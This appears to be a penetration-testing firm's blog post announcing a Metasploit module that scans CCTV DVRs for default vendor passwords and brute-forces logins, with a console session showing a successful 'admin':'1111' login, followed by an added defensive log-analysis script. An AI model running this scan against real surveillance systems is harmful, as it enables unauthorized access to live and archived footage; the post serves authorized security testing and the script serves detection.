A new module for the Metasploit Framework, CCTV DVR Login Scanning Utility*,
discovers and tests the security of standalone CCTV (Closed Circuit Television)
video surveillance systems. Such systems are frequently deployed in retail
stores, living communities, personal residences, and business environments as
part of their physical security program. However, many of these systems are
vulnerable to exploitation that can allow attackers remote access. Such remote
access, enabled by default, can allow attackers not only to view real-time
video, but also to control the cameras (if supported) and to access archived
footage.
Most owners of CCTV video surveillance systems may not even be fully aware of
the device's remote access capabilities, as monitoring may be conducted
exclusively via the local video console. This further increases the likelihood
of attackers gaining and maintaining remote access, with no indication to the
owner that their video surveillance system and archived footage may be accessed
remotely.
Here at Gotham Digital Science, we often encounter video surveillance systems
during penetration testing engagements – some of which may be exposed to the
Internet, either intentionally or by accident. With any video surveillance
system it is often interesting (and sometimes very important) to find out
exactly what cameras are monitoring/recording within the environment.
Furthermore, access to such systems can often be utilized to support physical
security testing initiatives.
This module targets standalone CCTV video surveillance systems by MicroDigital,
HIKVISION, CTRing, and a substantial number of other rebranded devices.
msf > use auxiliary/scanner/misc/cctv_dvr_login
msf auxiliary(cctv_dvr_login) > set RHOSTS 10.10.1.14
RHOSTS => 10.10.1.14
msf auxiliary(cctv_dvr_login) > exploit
[*] 10.10.1.14:5920 CCTV_DVR - [001/133] - Trying username:'admin' with password:''
[-] 10.10.1.14:5920 CCTV_DVR - [001/133] - Failed login as: 'admin'
[*] 10.10.1.14:5920 CCTV_DVR - [002/133] - Trying username:'user' with password:''
[-] 10.10.1.14:5920 CCTV_DVR - [002/133] - Invalid user: 'user'
[*] 10.10.1.14:5920 CCTV_DVR - [003/133] - Trying username:'admin' with password:'admin'
[-] 10.10.1.14:5920 CCTV_DVR - [003/133] - Failed login as: 'admin'
[*] 10.10.1.14:5920 CCTV_DVR - [004/133] - Trying username:'admin' with password:'1111'
[+] 10.10.1.14:5920 Successful login: 'admin' : '1111'
[*] Confirmed IE ActiveX HTTP interface (CtrWeb.cab v1,1,3,1): http://10.10.1.14:80
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
*CCTV DVR Login Scanning Utility:
This module tests for standalone CCTV DVR video surveillance deployments
specifically by MicroDigital, HIKVISION, CTRing, and numerous other rebranded
devices that are utilizing default vendor passwords. Additionally, this module
has the ability to brute force user accounts. Such CCTV DVR video surveillance
deployments support remote viewing through Central Management Software (CMS)
via the CMS Web Client, an IE ActiveX control hosted over HTTP, or through Win32
or mobile CMS client software. By default, remote authentication is handled over
port 5920/TCP with video streaming over 5921/TCP. After successful
authentication over 5920/TCP this module will then attempt to determine if the
IE ActiveX control is listening on the default HTTP port (80/TCP).
Module Name: auxiliary/scanner/misc/cctv_dvr_login
Authors: Mr. Justin Cacak
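An added example, not part of the original post or of the Metasploit module: a defender-side check over connection logs for the two conditions described above, namely bursts of connections to the authentication port 5920/TCP and any access to 5920/TCP or 5921/TCP from outside a trusted range. The log format, the 10.0.0.0/8 trusted range, the thresholds and all sample records are assumptions constructed for illustration, as is the premise that each login attempt is logged as a separate connection.

```python
import ipaddress
from collections import defaultdict, deque
from datetime import datetime

AUTH_PORT, STREAM_PORT = 5920, 5921              # defaults stated in the post
INTERNAL = [ipaddress.ip_network("10.0.0.0/8")]  # assumption: site's trusted range

# Constructed sample records: "ISO-time src dst dst_port" (format is an assumption)
SAMPLE = (
    [f"2024-01-01T10:00:{s:02d} 10.10.5.77 10.10.1.14 5920" for s in range(0, 24, 2)]
    + ["2024-01-01T10:05:00 10.10.2.20 10.10.1.14 5920",
       "2024-01-01T10:05:01 10.10.2.20 10.10.1.14 5921",
       "2024-01-01T11:30:00 203.0.113.9 10.10.1.14 5920"]
)

def parse(line):
    ts, src, dst, port = line.split()
    return datetime.fromisoformat(ts), src, dst, int(port)

def login_sweeps(lines, window=60, threshold=10):
    """Return {(src, dst): peak} where the number of connections to the auth
    port inside any `window`-second span reaches `threshold`."""
    recent, peaks = defaultdict(deque), {}
    for ts, src, dst, port in sorted(map(parse, lines)):
        if port != AUTH_PORT:
            continue
        q = recent[(src, dst)]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window:  # drop entries older than window
            q.popleft()
        if len(q) >= threshold:
            peaks[(src, dst)] = max(peaks.get((src, dst), 0), len(q))
    return peaks

def external_access(lines):
    """Return sorted (src, dst, port) for DVR-port connections from outside INTERNAL."""
    hits = set()
    for _, src, dst, port in map(parse, lines):
        addr = ipaddress.ip_address(src)
        if port in (AUTH_PORT, STREAM_PORT) and not any(addr in n for n in INTERNAL):
            hits.add((src, dst, port))
    return sorted(hits)

if __name__ == "__main__":
    print("possible login sweeps:", login_sweeps(SAMPLE))
    print("external access:", external_access(SAMPLE))
```

A single operator session (one connection each to 5920 and 5921) stays below the threshold, while the burst of twelve connections in under a minute is reported.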